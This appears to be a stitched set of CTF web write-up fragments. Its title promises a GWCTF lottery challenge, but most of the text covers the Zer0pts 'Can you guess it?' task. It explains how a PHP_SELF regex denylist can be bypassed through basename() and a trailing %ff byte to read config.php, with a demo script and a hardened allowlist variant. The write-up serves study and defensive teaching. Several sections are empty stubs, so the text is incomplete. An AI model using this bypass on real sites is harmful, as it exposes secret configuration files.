[GWCTF 2019] 枯燥的抽奖 (Boring Lottery): php_mt_seed script & pseudo-random number generation

We first open the page source and find a key snippet of code.

Solution

[Zer0pts2020]Can you guess it?

Opening the `source` link reveals the source code:


```php
<?php
include 'config.php'; // FLAG is defined in config.php

// Denylist: reject requests whose PHP_SELF ends in "config.php" (plus optional trailing slashes)
if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("I don't know what you are thinking, but I won't let you read it :)");
}

// Source viewer: highlights whatever basename() extracts from PHP_SELF,
// which is not the same string the regex above inspected
if (isset($_GET['source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}

// 64 random bytes -> 128 hex characters, compared in constant time
$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if (hash_equals($secret, $guess)) {
        $message = 'Congratulations! The flag is: ' . FLAG;
    } else {
        $message = 'Wrong.';
    }
}
?>
```

Now we audit the code.

Per the comment in the source, FLAG is defined in config.php, so the goal is to read config.php. The guess branch is a dead end: $secret is 64 fresh random bytes compared with hash_equals(), so it can be neither guessed nor timed. That leaves the ?source branch, which calls highlight_file() on basename($_SERVER['PHP_SELF']). The only thing guarding it is the regex on PHP_SELF above it, and the two do not examine the same thing: the regex looks at how the whole PHP_SELF string ends, while basename() only extracts the last path component, so they can disagree about which file the request refers to.
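As an added example (not part of the original writeup or the challenge), the following script isolates the two checks from the source above, the regex on $_SERVER['PHP_SELF'] and the basename() call that picks the file for highlight_file(), and runs them side by side over a few constructed PHP_SELF values, next to an allowlist-based hardened variant. The candidate paths are constructed for illustration; the claim that basename() ignores a trailing byte that is invalid in the current locale (such as 0xff under glibc's C or UTF-8 locales) is an assumption about the PHP runtime and should be confirmed against the target's PHP build and locale.

```php
<?php
// Added example, not from the challenge: replays the two checks from the
// challenge source against constructed PHP_SELF values so that any
// disagreement between them becomes visible.

// Assumption: glibc-based PHP. Under glibc's C locale bytes >= 0x80 are
// invalid multibyte sequences, which is what basename()'s behaviour below
// depends on. Fix the locale so the result does not depend on the environment.
setlocale(LC_CTYPE, 'C');

// Check 1: the denylist from the challenge, same regex, applied to PHP_SELF.
function filter_blocks(string $php_self): bool
{
    return preg_match('/config\.php\/*$/i', $php_self) === 1;
}

// Check 2: the file the ?source branch hands to highlight_file().
// basename() is locale aware: a byte that is invalid in the current locale
// does not start a new path component, so "config.php/\xff" can still yield
// "config.php" even though the string no longer ends in "config.php".
function file_served(string $php_self): string
{
    return basename($php_self);
}

// Hardened variant (added here, not from the challenge): decide with an
// allowlist of names that may be shown instead of a denylist regex. Whatever
// basename() yields, only a listed name is ever passed to highlight_file().
const SOURCE_ALLOWLIST = ['index.php'];

function file_served_hardened(string $php_self): ?string
{
    $target = basename($php_self);
    return in_array($target, SOURCE_ALLOWLIST, true) ? $target : null;
}

// Constructed PHP_SELF values. Assumes the web server routes /index.php/<extra>
// to index.php with <extra> as URL-decoded PATH_INFO, so PHP_SELF carries the
// decoded bytes (the last entry is what %ff in the URL would arrive as).
$candidates = [
    '/index.php'                          => '/index.php',
    '/index.php/config.php'               => '/index.php/config.php',
    '/index.php/config.php/'              => '/index.php/config.php/',
    '/index.php/config.php/x'             => '/index.php/config.php/x',
    '/index.php/config.php/%ff (decoded)' => "/index.php/config.php/\xff",
];

printf("%-38s %-8s %-14s %s\n", 'PHP_SELF', 'blocked', 'basename()', 'hardened');
foreach ($candidates as $label => $php_self) {
    printf(
        "%-38s %-8s %-14s %s\n",
        $label,
        filter_blocks($php_self) ? 'yes' : 'no',
        // escape high bytes as octal so a returned "\xff" is visible in the table
        addcslashes(file_served($php_self), "\x80..\xff"),
        file_served_hardened($php_self) ?? '(refused)'
    );
}
```

Run it with `php` on the command line and compare the `blocked` and `basename()` columns row by row: the rows that end in `config.php` or `config.php/` are blocked, the row ending in `x` passes but resolves to the wrong file, and, under the locale assumption stated above, the last row passes the regex while basename() still resolves to `config.php`. The `hardened` column refuses every row but `/index.php`, because it asks which names are allowed rather than which string endings are forbidden.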

Solution

[FBCTF2019]RCEService

Send the command as JSON: {"cmd":"ls"}


Then we look at the source code again (the competition probably provided it; I could not find it).

Solution